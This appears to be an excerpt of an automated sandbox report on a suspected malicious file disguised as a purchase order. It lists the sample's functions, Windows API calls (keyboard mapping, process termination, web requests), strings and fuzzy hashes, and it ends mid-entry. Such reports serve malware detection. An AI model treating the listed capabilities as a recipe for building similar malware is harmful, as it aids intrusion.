                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                      • String ID:
                      • API String ID: 1423608774-0
                      • Opcode ID: 1929a67fc569f3bc67e44b0f7197e69096c46a509f0512edb723132c612c17c1
                      • Instruction ID: fd31a8ea27887858078b7e9fbf44a74066fbceae002c7fa837bd765d7da64dd0
                      • Opcode Fuzzy Hash: 1929a67fc569f3bc67e44b0f7197e69096c46a509f0512edb723132c612c17c1
                      • Instruction Fuzzy Hash: B701A436541211ABD7152B58ED48DEB77AAFF9A702B80452AF503972A1CFB4AC00CB91
                      Function 00A91867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                      Download Yara Rule
                      APIs
                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A91898
                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00A918A0
                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A918AB
                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A918B6
                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00A918BE
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A918C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Virtual
                      • String ID:
                      • API String ID: 4278518827-0
                      • Opcode ID: 577a52bf346bebf0b83adc802fa55670185daf37480723efb68ebaf643ca4640
                      • Instruction ID: 3b9bcdf7a7579d8408eeae52ed9e90d99d2af7cc2bd444ae3a97b82ffc07ce0d
                      • Opcode Fuzzy Hash: 577a52bf346bebf0b83adc802fa55670185daf37480723efb68ebaf643ca4640
                      • Instruction Fuzzy Hash: 1D0167B0902B5ABDE3008F6A8C85B52FFB8FF19354F04411BA15C47A42C7F5A864CBE5
                      Function 00AD84F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                      Download Yara Rule
                      APIs
                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00AD8504
                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00AD851A
                      • GetWindowThreadProcessId.USER32(?,?), ref: 00AD8529
                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AD8538
                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AD8542
                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AD8549
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                      • String ID:
                      • API String ID: 839392675-0
                      • Opcode ID: fd2fede7731c687fd2c279597ed0bf3412b27463966a5873650445d082c66686
                      • Instruction ID: 3af5fa37420c26538afc17cf73c4d7324f1e272211ff92879dd4d740885e70fc
                      • Opcode Fuzzy Hash: fd2fede7731c687fd2c279597ed0bf3412b27463966a5873650445d082c66686
                      • Instruction Fuzzy Hash: C8F0BE32240158BBE7201B629C0EEEF3F7CDFC6B11F404018FA05E2050EFA42A01C6B4
                      Function 00ADA31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • InterlockedExchange.KERNEL32(?,?), ref: 00ADA330
                      • EnterCriticalSection.KERNEL32(?,?,?,?,00B066D3,?,?,?,?,?,00A9E681), ref: 00ADA341
                      • TerminateThread.KERNEL32(?,000001F6,?,?,?,00B066D3,?,?,?,?,?,00A9E681), ref: 00ADA34E
                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00B066D3,?,?,?,?,?,00A9E681), ref: 00ADA35B
                        • Part of subcall function 00AD9CCE: CloseHandle.KERNEL32(?,?,00ADA368,?,?,?,00B066D3,?,?,?,?,?,00A9E681), ref: 00AD9CD8
                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00ADA36E
                      • LeaveCriticalSection.KERNEL32(?,?,?,?,00B066D3,?,?,?,?,?,00A9E681), ref: 00ADA375
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                      • String ID:
                      • API String ID: 3495660284-0
                      • Opcode ID: edad5dcedc27b920134e53c6b70838f008068f54232d890ee26d864128e402d1
                      • Instruction ID: dc07a182b7fc25d1efc266f16b0d510e1bdf06166924a533032710f0ed68f212
                      • Opcode Fuzzy Hash: edad5dcedc27b920134e53c6b70838f008068f54232d890ee26d864128e402d1
                      • Instruction Fuzzy Hash: 92F08236141211BBD3112B64ED4CDDB7B7AFF8A302B804522F203A71A1CFB59851CB91
                      Function 00AAD7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AB010A: std::exception::exception.LIBCMT ref: 00AB013E
                        • Part of subcall function 00AB010A: __CxxThrowException@8.LIBCMT ref: 00AB0153
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                        • Part of subcall function 00A9BBD9: _memmove.LIBCMT ref: 00A9BC33
                      • __swprintf.LIBCMT ref: 00AAD98F
                      Strings
                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00AAD832
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                      • API String ID: 1943609520-557222456
                      • Opcode ID: 5b355ce1c9edf23cd7554a04993fa93432633c3b2a6595d29a2cb7d9aa466687
                      • Instruction ID: 451047516cbf6a54acfa6f4ed7937fae907bffcd8f5ff4e6039ac1a4e497eef3
                      • Opcode Fuzzy Hash: 5b355ce1c9edf23cd7554a04993fa93432633c3b2a6595d29a2cb7d9aa466687
                      • Instruction Fuzzy Hash: 35914A716182019FCB14EF64CA86D6FBBE4EF86700F00495DF4969B6E1EB20ED45CB52
                      Function 00AEB482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                      Download Yara Rule
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 00AEB4A8
                      • CharUpperBuffW.USER32(?,?), ref: 00AEB5B7
                      • VariantClear.OLEAUT32(?), ref: 00AEB73A
                        • Part of subcall function 00ADA6F6: VariantInit.OLEAUT32(00000000), ref: 00ADA736
                        • Part of subcall function 00ADA6F6: VariantCopy.OLEAUT32(?,?), ref: 00ADA73F
                        • Part of subcall function 00ADA6F6: VariantClear.OLEAUT32(?), ref: 00ADA74B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                      • API String ID: 4237274167-1221869570
                      • Opcode ID: a3d51a7f685e67173d5ba80522102bed283dbe0df1505ac710ad14c8e94cfaa2
                      • Instruction ID: 01d642c60d04bc8f23130544b043df2f44320c9be68883859c12443caf58888a
                      • Opcode Fuzzy Hash: a3d51a7f685e67173d5ba80522102bed283dbe0df1505ac710ad14c8e94cfaa2
                      • Instruction Fuzzy Hash: 3B918A706183419FCB10DF29C58595BB7F4AF89710F04886DF88A8B3A2DB31E945CB62
                      Function 00AD5D65 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A93BCF: _wcscpy.LIBCMT ref: 00A93BF2
                      • _memset.LIBCMT ref: 00AD5E56
                      • GetMenuItemInfoW.USER32(?), ref: 00AD5E85
                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AD5F31
                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00AD5F5B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                      • String ID: 0
                      • API String ID: 4152858687-4108050209
                      • Opcode ID: 9b7260aa3ced79d7857e5970fa48251af03981a4e0ab0141c8287325df07c864
                      • Instruction ID: 5b5011a0667efceb145c6e5f39737da90a5d53126ea512a20df666a890961301
                      • Opcode Fuzzy Hash: 9b7260aa3ced79d7857e5970fa48251af03981a4e0ab0141c8287325df07c864
                      • Instruction Fuzzy Hash: 2351D332A147019AD715EB3CC945BABB7E8EF59350F080A2EF897D7291DB70CD448792
                      Function 00AD1050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00AD10B8
                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00AD10EE
                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00AD10FF
                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00AD1181
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorMode$AddressCreateInstanceProc
                      • String ID: DllGetClassObject
                      • API String ID: 753597075-1075368562
                      • Opcode ID: 300187ea8d87f28cde8bacd2011eaff286d3150d48fe91b27b1d0862e6435cb9
                      • Instruction ID: 1dc8b2e770486a49c87a56d97e7b801039850a5a134065e91977356197d1478f
                      • Opcode Fuzzy Hash: 300187ea8d87f28cde8bacd2011eaff286d3150d48fe91b27b1d0862e6435cb9
                      • Instruction Fuzzy Hash: 534129B1600205FFDB15CF55C884B9ABBB9EF44754B1481AEFA0A9F305D7B1DA44CBA0
                      Function 00AD5A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 00AD5A93
                      • GetMenuItemInfoW.USER32 ref: 00AD5AAF
                      • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00AD5AF5
                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B518F0,00000000), ref: 00AD5B3E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Menu$Delete$InfoItem_memset
                      • String ID: 0
                      • API String ID: 1173514356-4108050209
                      • Opcode ID: 0cb392341139f6bae4fd9df29e8dcac7f4146a6f0be457b5cec8611c52f33447
                      • Instruction ID: c03a201978f72c51f23077ea994570e87e37ddb3829a566c077f7c4ee70909e5
                      • Opcode Fuzzy Hash: 0cb392341139f6bae4fd9df29e8dcac7f4146a6f0be457b5cec8611c52f33447
                      • Instruction Fuzzy Hash: C6416E716047019FDB149F24C884B5ABBE5EF89714F14461FF9A69B3D1E770A800CB62
                      Function 00AF0458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                      Download Yara Rule
                      APIs
                      • CharLowerBuffW.USER32(?,?,?,?), ref: 00AF0478
                        • Part of subcall function 00A97F40: _memmove.LIBCMT ref: 00A97F8F
                        • Part of subcall function 00A9A2FB: _memmove.LIBCMT ref: 00A9A33D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memmove$BuffCharLower
                      • String ID: cdecl$none$stdcall$winapi
                      • API String ID: 2411302734-567219261
                      • Opcode ID: 93dce18c18e185d8d3e48e2167defc0507cf9ed4aa1574c06a5189a8fc233c58
                      • Instruction ID: 37635e7b08491df0cf361b6c9e090c471f822f8d97b0163e39a168cc06dd7f9d
                      • Opcode Fuzzy Hash: 93dce18c18e185d8d3e48e2167defc0507cf9ed4aa1574c06a5189a8fc233c58
                      • Instruction Fuzzy Hash: 49316D75600619AFCF04DF98C941ABEB3F5FF15350B108A29E562972D2DB71EA05CF80
                      Function 00ACC600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00ACC684
                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00ACC697
                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00ACC6C7
                        • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 458670788-1403004172
                      • Opcode ID: 9225fe16870f89dd16ba6d87bf11d26f79284093000b0e9fde479bda8174e3af
                      • Instruction ID: e32ac47711f5e2a4d8dd932ab2a8af1d0c5c68141d5583733a1ed7f737b44d1e
                      • Opcode Fuzzy Hash: 9225fe16870f89dd16ba6d87bf11d26f79284093000b0e9fde479bda8174e3af
                      • Instruction Fuzzy Hash: DB21F171A00108BEDB04EB64C986EFFBBB9DF06360B11961DF42AE71E1DB745D0A9720
                      Function 00AE4A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                      Download Yara Rule
                      APIs
                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00AE4A60
                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AE4A86
                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00AE4AB6
                      • InternetCloseHandle.WININET(00000000), ref: 00AE4AFD
                        • Part of subcall function 00AE56A9: GetLastError.KERNEL32(?,?,00AE4A2B,00000000,00000000,00000001), ref: 00AE56BE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                      • String ID:
                      • API String ID: 1951874230-3916222277
                      • Opcode ID: 06fe1797266badeb48c0bdaacd7ce875d81a2ad382972aa98a895e9463ced450
                      • Instruction ID: 882c28041cd61df97041c4b88e8b60fdd9112091e24eb083bb37d8ddb57ed62f
                      • Opcode Fuzzy Hash: 06fe1797266badeb48c0bdaacd7ce875d81a2ad382972aa98a895e9463ced450
                      • Instruction Fuzzy Hash: 5F21CFB5540208BFEB11DF669C84EBBB6FCEB8C798F10402AF50597140EA649D059771
                      Function 00AF8EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AAC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AAC657
                        • Part of subcall function 00AAC619: GetStockObject.GDI32(00000011), ref: 00AAC66B
                        • Part of subcall function 00AAC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AAC675
                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00AF8F69
                      • LoadLibraryW.KERNEL32(?), ref: 00AF8F70
                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00AF8F85
                      • DestroyWindow.USER32(?), ref: 00AF8F8D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                      • String ID: SysAnimate32
                      • API String ID: 4146253029-1011021900
                      • Opcode ID: 429dc97ca0efbdb5dbab28e99d548755e19f321c6fc39bf896f38d584e9200e3
                      • Instruction ID: 77bc8e72b1eda64cf36e6f5532e7d76e3a10b583b0eddb887f8976c154779278
                      • Opcode Fuzzy Hash: 429dc97ca0efbdb5dbab28e99d548755e19f321c6fc39bf896f38d584e9200e3
                      • Instruction Fuzzy Hash: EA21AC71200209AFEF104FA4EC80EBB77AEEF49364F104628FB1597191CB79DC509760
                      Function 00ADE382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 00ADE392
                      • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 00ADE3E6
                      • __swprintf.LIBCMT ref: 00ADE3FF
                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,00B2DBF0), ref: 00ADE43D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorMode$InformationVolume__swprintf
                      • String ID: %lu
                      • API String ID: 3164766367-685833217
                      • Opcode ID: 88921d5a18ef5d6a83db2b07db9c918c2c712464aab9697ed0b393fb35df68d3
                      • Instruction ID: 10662ec598aa333e649a9c6fd778e4db25fc0e6c50f21570191aaf1e020628cc
                      • Opcode Fuzzy Hash: 88921d5a18ef5d6a83db2b07db9c918c2c712464aab9697ed0b393fb35df68d3
                      • Instruction Fuzzy Hash: BA214F75A40108AFCB10EB64C985EEEB7F8EF99714B1080A9F509EB251D631DA05CB50
                      Function 00ACD7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                        • Part of subcall function 00ACD623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ACD640
                        • Part of subcall function 00ACD623: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ACD653
                        • Part of subcall function 00ACD623: GetCurrentThreadId.KERNEL32 ref: 00ACD65A
                        • Part of subcall function 00ACD623: AttachThreadInput.USER32(00000000), ref: 00ACD661
                      • GetFocus.USER32 ref: 00ACD7FB
                        • Part of subcall function 00ACD66C: GetParent.USER32(?), ref: 00ACD67A
                      • GetClassNameW.USER32(?,?,00000100), ref: 00ACD844
                      • EnumChildWindows.USER32(?,00ACD8BA), ref: 00ACD86C
                      • __swprintf.LIBCMT ref: 00ACD886
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                      • String ID: %s%d
                      • API String ID: 1941087503-1110647743
                      • Opcode ID: 17e1cee4c6c5f82419ee21ec24bc0f57939f868ac52d919c26c162032923adff
                      • Instruction ID: d798cc8805b90a16383d3329afd0522796139e8b7c6071aa3bd316cdfa6d7b3a
                      • Opcode Fuzzy Hash: 17e1cee4c6c5f82419ee21ec24bc0f57939f868ac52d919c26c162032923adff
                      • Instruction Fuzzy Hash: A111AF756102056BDF11BF608D86FEA37A9AB44704F0180B9BA0DAB186CBB45945DB70
                      Function 00AF1836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                      Download Yara Rule
